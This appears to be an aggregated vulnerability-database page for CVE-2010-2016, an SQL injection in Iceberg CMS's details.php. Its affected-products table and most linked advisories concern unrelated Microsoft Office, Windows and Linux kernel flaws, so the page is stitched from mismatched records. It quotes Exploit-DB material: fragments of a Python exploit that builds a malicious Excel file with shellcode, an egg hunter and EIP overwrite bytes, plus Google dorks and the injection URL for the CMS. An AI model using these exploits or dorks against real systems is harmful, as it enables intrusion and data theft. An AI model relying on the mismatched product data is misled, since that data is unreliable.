CVE-2010-2016
Published 2010-05-24
CVE-2010-2016: SQL injection vulnerability in details.php in Iceberg CMS allows remote attackers to execute arbitrary SQL commands via the p_id parameter.
Priority P343 · high · 7.5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.15% (62.9th percentile)
Affected
31 ranges · showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| msrc | excel_services_on_microsoft_sharepoint_server_2007_service_pack_3 | — | — |
| msrc | excel_services_on_microsoft_sharepoint_server_2010_service_pack_2_bad | — | — |
| msrc | microsoft_excel_2007_service_pack_3 | — | — |
| msrc | microsoft_excel_2010_service_pack_2 | — | — |
| msrc | microsoft_excel_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_excel_2013_service_pack_1 | — | — |
| msrc | microsoft_excel_2016 | — | — |
| msrc | microsoft_excel_2016_for_mac | — | — |
| msrc | microsoft_excel_viewer_2007_service_pack_3 | — | — |
| msrc | microsoft_office_2007_service_pack_3 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_office_2013_service_pack_1 | — | — |
| msrc | microsoft_office_2016_for_mac | — | — |
| msrc | microsoft_office_compatibility_pack_service_pack_3 | — | — |
| msrc | microsoft_office_for_mac_2011 | — | — |
| msrc | microsoft_office_web_apps_2010_service_pack_2 | — | — |
| msrc | microsoft_office_word_viewer | — | — |
| msrc | microsoft_word_2007_service_pack_3 | — | — |
| msrc | microsoft_word_2010_service_pack_2 | — | — |
| msrc | microsoft_word_for_mac_2011 | — | — |
| msrc | windows_7_for_32-bit_systems_service_pack_1 | — | — |
| msrc | windows_7_for_x64-based_systems_service_pack_1 | — | — |
| msrc | windows_server_2008_for_32-bit_systems_service_pack_2 | — | — |
| msrc | windows_server_2008_for_itanium-based_systems_service_pack_2 | — | — |
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_msrc · 7.8 HIGH
vendor_redhat · 7.8 HIGH
GHSA
GHSA-fpfj-66xm-fh42: SQL injection vulnerability in details
ghsa_unreviewed·2022-05-17
CVE-2010-2016 [HIGH] CWE-89 GHSA-fpfj-66xm-fh42: SQL injection vulnerability in details
SQL injection vulnerability in details.php in Iceberg CMS allows remote attackers to execute arbitrary SQL commands via the p_id parameter.
Microsoft
Microsoft Office Information Disclosure Vulnerability
vendor_msrc·2016-12-13·CVSS 7.1
CVE-2016-7268 [HIGH] Microsoft Office Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out of bound memory.
Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office software.
The security update addresses the vulnerability by properly initializing the affected variable.
FAQ: I have Microsoft Word 2010 installed. Why am I not being offered the 3128023 update?
The 3128023 update only applies to systems running specific configurations of Microsoft Office 2010. Some configurations will not be
Microsoft
Microsoft Excel Information Disclosure Vulnerability
vendor_msrc·2016-12-13·CVSS 7.1
CVE-2016-7265 [HIGH] Microsoft Excel Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Microsoft Excel software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out of bound memory.
Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Excel software.
The security update addresses the vulnerability by properly initializing the affected variable.
FAQ: I have Microsoft Word 2010 installed. Why am I not being offered the 3128023 update?
The 3128023 update only applies to systems running specific configurations of Microsoft Office 2010. Some configurations will not be off
Microsoft
Microsoft Office Information Disclosure Vulnerability
vendor_msrc·2016-12-13·CVSS 7.1
CVE-2016-7291 [HIGH] Microsoft Office Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out of bound memory.
Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office software.
The security update addresses the vulnerability by properly initializing the affected variable.
FAQ: I have Microsoft Word 2010 installed. Why am I not being offered the 3128023 update?
The 3128023 update only applies to systems running specific configurations of Microsoft Office 2010. Some configurations will not be
Microsoft
Microsoft Office Information Disclosure Vulnerability
vendor_msrc·2016-12-13·CVSS 7.1
CVE-2016-7276 [HIGH] Microsoft Office Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out of bound memory.
Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office software.
The security update addresses the vulnerability by properly initializing the affected variable.
FAQ: I have Microsoft Word 2010 installed. Why am I not being offered the 3128023 update?
The 3128023 update only applies to systems running specific configurations of Microsoft Office 2010. Some configurations will not be
Red Hat
kernel: v4l: videobuf: hotfix a bug on multiple calls to mmap()
vendor_redhat·2010-07-29·CVSS 7.8
CVE-2010-5321 [HIGH] kernel: v4l: videobuf: hotfix a bug on multiple calls to mmap()
Memory leak in drivers/media/video/videobuf-core.c in the videobuf subsystem in the Linux kernel 2.6.x through 4.x allows local users to cause a denial of service (memory consumption) by leveraging /dev/video access for a series of mmap calls that require new allocations, a different vulnerability than CVE-2007-6761. NOTE: as of 2016-06-18, this affects only 11 drivers that have not been updated to use videobuf2 instead of videobuf.
Statement: This issue does not affect the Linux kernel packages as shipped with Red Hat Enterprise Linux 5. This issue does affect the Linux kernel packages as shipped with Red Hat Enterprise Linux 6, 7 and Red Hat Enterprise MRG 2.
Based on the absence of upstream patch addressing this issue in
No detection rules found.
Exploit-DB
Microsoft Excel - OLE Arbitrary Code Execution
exploitdb·2017-09-30
CVE-2017-0199 Microsoft Excel - OLE Arbitrary Code Execution
---
Title: MS Office Excel (all versions) Arbitrary Code Execution Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007,2010,2013,2016 32/64 bits (x86 and x64)
Tested on: Windows 10/8.1/8.0/7/Server 2012/Server 2008/Vista (X86 and x64)
CVE: 2017-0199
Description:
MS Excel contains a remote code execution vulnerability upon processing OLE objects. Although this is a different issue from the
MS Word HTA execution vulnerability, it has been patched together, 'silently'. By performing some tests from the Word HTA PoC posted
on exploit-db[dot]com, it's possible to exploit it through Excel too, however the target would ne
Exploit-DB
Excel RTD - Memory Corruption
exploitdb·2010-09-10·CVSS 9.3
CVE-2010-1247 [CRITICAL] Excel RTD - Memory Corruption
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ 266:
print "[*] Error : Shellcode length is long"
return
if len(eggHunter) 0 :
eggHunter += '\x90'
dif = dif - 1
if len(shellcode) > 800:
print "[*] Error : Shellcode length is long"
return
if len(shellcode) 0 :
shellcode += '\x90'
dif = dif - 1
fdW= open('exploit.xls', 'wb+')
fdW.write(str1)
fdW.write("\x41\x41\x41") # padding
fdW.write(jmp)
fdW.write(eggHunter)
fdW.write("\xeb\x06\x41\x41")
fdW.write(eip)
fdW.write("\x81\xc4\x24\x16\x00\x00") # add esp,2016
fdW.write("\xc3") #ret
i = 0
while i < 54 :
fdW.write("\x41\x41\x41\x41") # padding
i = i + 1
fdW.write(str2)
fdW.write(shellcode)
fdW.write(str3)
fdW.close()
fdR.close()
print '[-
Exploit-DB
The iceberg - 'Content Management System' SQL Injection
exploitdb·2010-05-16
CVE-2010-2016 The iceberg - 'Content Management System' SQL Injection
---
The iceberg 'Content Management System' SQL Injection Vulnerability
# The iceberg 'Content Management System' SQL Injection Vulnerability
# Homepage : http://www.imagetraders.com.au
# Discovered : by cyberlog
# Dork : details.php?p_id=
# Dork : 'Design & SEO by Image Traders Pty Ltd'
# Exploit : http://[target]/details.php?p_id=[SQL Injection]
# Thanks : r0073r,adhietslank, k1n9k0ng, cr4wl3r,cah_gemblunkz, jayoes,thesims,setiawan,irvian,EA_Angel,BlueSpy,SoEy,A-technique,Jantap,KiLL SarifJedul,wiro gendeng,Letjen,ridho_bugs,Ryan Kabrutz,Mathewsa.k.a Nyubicrew
# My Site : http://sekuritionline.net
# Channel : #sekuritionline
#special to Mama Sri Rahayu, Member& Staff Sekuritonline, C0li a.k.a antisecurity [ pinjem script perl-na
http://packetstormsecurity.org/1005-exploits/iceberg-sql.txt
http://secunia.com/advisories/39833
http://www.exploit-db.com/exploits/12620
http://www.osvdb.org/64694
http://www.vupen.com/english/advisories/2010/1161
https://exchange.xforce.ibmcloud.com/vulnerabilities/58617